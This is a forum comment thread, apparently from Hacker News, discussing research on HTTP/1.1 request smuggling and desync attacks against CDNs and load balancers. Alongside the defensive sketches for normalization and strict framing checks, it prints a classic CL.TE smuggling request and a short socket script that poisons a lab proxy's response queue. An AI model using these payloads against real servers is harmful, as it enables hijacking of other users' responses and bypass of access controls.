> Hi, I’m the author of this research. It’s great to see interest and I can promise some quality research and a strong argument to kill HTTP/1.1 but the headline of this article goes a bit too far. The specific CDN vulnerabilities have been disclosed to the vendors and patched (hence the past tense in the abstract) – I wouldn’t drop zero day on a CDN!
From the comment section. In other words, click-bait title.
sam_lowry_ · 3h ago
Killing HTTP/1.1 is killing the open web, because HTTP/2 and HTTP/3 depend on CA infrastructure.
bullen · 2h ago
I think I figured out a way to do secure registration with a MITM present without certificates, so there might be a way out of this mess.
But you still need to transfer the client and check its hash for it to work, and that's hard to implement in practice.
But you could bootstrap the thing over HTTPS (the download of the client) and then never need it again, which is neat. Especially if you use TCP/HTTP now.
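For what it's worth, that bootstrap-then-verify step could look something like the minimal sketch below. The URL and expected digest are placeholders, not real values; the digest would have to be published out of band.

```python
# Minimal sketch of the bootstrap idea: fetch the client once over HTTPS,
# verify its hash against a digest obtained out of band, and only then trust it.
# CLIENT_URL and EXPECTED_SHA256 are placeholders, not real values.
import hashlib
import urllib.request

CLIENT_URL = "https://example.com/client.bin"
EXPECTED_SHA256 = "replace-with-the-published-digest"

def fetch_and_verify(url: str, expected_sha256: str) -> bytes:
    with urllib.request.urlopen(url) as resp:  # HTTPS is only needed for this one step
        blob = resp.read()
    digest = hashlib.sha256(blob).hexdigest()
    if digest != expected_sha256:
        raise ValueError(f"client hash mismatch: got {digest}")
    return blob
```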
Tohsig · 2h ago
Appreciate you pointing that out. HTTP/1.1 may be getting long in the tooth, but this particular vulnerability seems straightforward to mitigate to me, especially at the CDN level.
Forgive my optimism here but this seems overblown and trivial to detect and reject in firewalls/cdns.
Cloudflare most recently blocked a vulnerability affecting some PHP websites where a zip file upload contained a reverse shell. This seems simple in comparison (probably because it is).
This sensationalist headline, that doomsday style clock (as another poster shared) makes me question the motives of these researchers. Have they shorted any CDN stocks?
Retr0id · 3h ago
The underlying flaw is a parser differential. To detect that generically you'd need a model of both(/all) parsers involved, and to detect when they diverge. This is non-trivial.
You can have the CDN normalize requests so that it always outputs well-formed requests. That way only one parser ever deals with untrusted/ambiguous input.
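As a rough sketch of that normalization idea (a hypothetical helper, not any particular CDN's code): the front-end parses the request once and re-serializes it with a single unambiguous framing before forwarding, so the origin never sees the raw client bytes.

```python
# Sketch of front-end request normalization: re-emit the request with framing
# chosen by the proxy alone (explicit Content-Length, no Transfer-Encoding),
# so only the proxy's parser ever has to interpret ambiguous input.
def normalize(method: str, target: str, headers: dict[str, str], body: bytes) -> bytes:
    framing_headers = {"content-length", "transfer-encoding", "connection"}
    lines = [f"{method} {target} HTTP/1.1"]
    for name, value in headers.items():
        if name.lower() not in framing_headers:  # drop anything that affects framing
            lines.append(f"{name}: {value}")
    lines.append(f"Content-Length: {len(body)}")  # the proxy decides the framing
    return "\r\n".join(lines).encode("latin-1") + b"\r\n\r\n" + body
```

A real proxy has more to worry about (duplicate headers, obs-fold, trailers, connection reuse), but the principle is the one described above.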
Kinrany · 3h ago
"Stop working" here apparently means scheduled release of an exploit of a vulnerability in proxies that do access control and incorrectly handle combinations of headers Content-Length and Transfer-Encoding: chunked.
Retr0id · 3h ago
> incorrectly handle combinations of headers Content-Length and Transfer-Encoding: chunked.
I think the article uses this as an example of the concept of Request Smuggling in general. This broad approach has been known for a long time. I assume the new research uses conceptually similar but concretely different approaches to trigger parser desyncs.
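For readers who haven't seen it, the long-known CL.TE variant referenced above looks like this (the textbook example, not the new research):

```python
# Classic CL.TE ambiguity: a front-end that trusts Content-Length sees one
# complete request whose 6-byte body is "0\r\n\r\nG"; a back-end that trusts
# Transfer-Encoding sees an empty chunked body and keeps the trailing "G"
# as the first byte of the *next* request on the reused connection.
AMBIGUOUS_REQUEST = (
    b"POST / HTTP/1.1\r\n"
    b"Host: example.com\r\n"
    b"Content-Length: 6\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"\r\n"
    b"0\r\n"
    b"\r\n"
    b"G"  # smuggled prefix: the next request's method becomes "GGET" or similar
)
```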
joshstrange · 3h ago
I might just be stupid but I'm not quite seeing the full issue I think.
From my reading this is a problem if:
1. Your CDN/Load balancer allows for HTTP/1.1 connections
2. You do some filtering/firewalling/auth/etc at your CDN/Load balancer for specific endpoints
I'm sure it's more than that, and I'm just missing it.
If you do all your filtering/auth/etc on your backend servers this doesn't matter right? Obviously people DO filtering/auth/etc at the edge so they would be affected but 1/3rd seems high. Maybe 1/3rd of traffic is HTTP/1.1 but they would also have to be doing filtering/auth at the edge to be hit by this right?
Again, for the 3rd time, I'm probably missing something, just trying to better understand the issue.
mhitza · 3h ago
If it's similar to a vulnerability reported a couple of years back, the gist of it would be:
Some load balancers front multiple applications by multiplexing requests over a single HTTP/1.1 connection, and bugs occur in the handling, generally around request boundaries.
For example, you can have an HTTP/1.1 front connection that behind the scenes operates separate HTTP/1.0, 1.1, 2, or 3 connections.
By smuggling additional data through a request you trip up the handler at the load balancer into injecting a response that shouldn't be there, which then gets served to one of the clients (even for the wrong client's request).
Similar to the HTTP response splitting attacks of the past.
E.g. 3 requests come into the load balancer, and request 2 smuggles in an extra request whose response can end up served as the response to request 1 or 3.
That's how I understood the last such attack.
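A rough sketch of how that plays out on the wire, against a purely hypothetical vulnerable lab front-end (LAB_HOST is a placeholder; a correctly patched proxy just returns two ordinary responses). In the real attack the follow-up request would come from a different client sharing the same back-end connection:

```python
# Sketch of response-queue poisoning via a CL.TE desync. The smuggled prefix is
# left unread on the back-end connection; the next request to arrive completes
# it, and its sender receives the response for /secret instead of their own.
import socket

LAB_HOST, LAB_PORT = "lab.example", 80  # placeholder target, not a real host

smuggled_prefix = b"GET /secret HTTP/1.1\r\nX: "  # header left open on purpose
body = b"0\r\n\r\n" + smuggled_prefix             # empty chunked body + prefix

desync = (
    b"POST / HTTP/1.1\r\n"
    b"Host: lab.example\r\n"
    + b"Content-Length: " + str(len(body)).encode() + b"\r\n"
    + b"Transfer-Encoding: chunked\r\n"
    + b"\r\n"
    + body
)
follow_up = b"GET / HTTP/1.1\r\nHost: lab.example\r\n\r\n"

with socket.create_connection((LAB_HOST, LAB_PORT)) as s:
    s.sendall(desync)
    s.sendall(follow_up)  # on a vulnerable front/back pair this gets /secret's response
    print(s.recv(65536).decode(errors="replace"))
```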
This title is super misleading; it's not going to stop working, unless PortSwigger plans on using this to DDoS all HTTP/1.1 servers?
daedrdev · 3h ago
There are numerous HTTP header vulnerabilities that CDNs already fix and block, how is this different?
raver1975 · 4h ago
Doesn't compare to the mayhem and destruction we experienced during Y2K.
scoreandmore · 3h ago
I’m guessing you weren’t even born yet, because the industry started working on this in the early 1990s. Or do you still make jokes about the old lady and the hot McDonald’s coffee?
charcircuit · 4h ago
Is it really impossible for the CDNs to mitigate the vulnerability without disabling the site altogether? I'm skeptical that is the case. I'm sure there is a way to properly separate different requests.
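One way to "properly separate requests" is simply to refuse anything whose framing two parsers could plausibly disagree on, rather than trying to interpret it. A minimal sketch of that check (a real implementation needs far more cases: obs-fold, odd whitespace, header repetition rules, etc.):

```python
# Sketch of a strict framing check: reject any request where reasonable parsers
# could disagree about where the body ends, instead of guessing.
def framing_is_unambiguous(headers: list[tuple[str, str]]) -> bool:
    cl_values = [v.strip() for k, v in headers if k.lower() == "content-length"]
    te_values = [v for k, v in headers if k.lower() == "transfer-encoding"]
    if cl_values and te_values:          # both present: the classic smuggling setup
        return False
    if len(set(cl_values)) > 1:          # conflicting Content-Length values
        return False
    if te_values:
        codings = [c.strip().lower() for v in te_values for c in v.split(",")]
        if codings != ["chunked"]:       # anything but a single plain "chunked"
            return False
    return True
```

Whether that can be deployed without breaking legitimate (if sloppy) clients is presumably part of why this is hard at CDN scale.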
Following through the links referenced in the article, this appears to be the actual underlying research: https://portswigger.net/research/http-desync-attacks-request...
https://github.com/narfindustries/http-garden
See https://youtu.be/aKPAX00ft5s?feature=shared&t=8730 for a relevant demo.
You can also (in principle) steal responses intended for other clients, and control responses that get delivered to other clients.
So, I can't tell if it's real(ish) or advertising.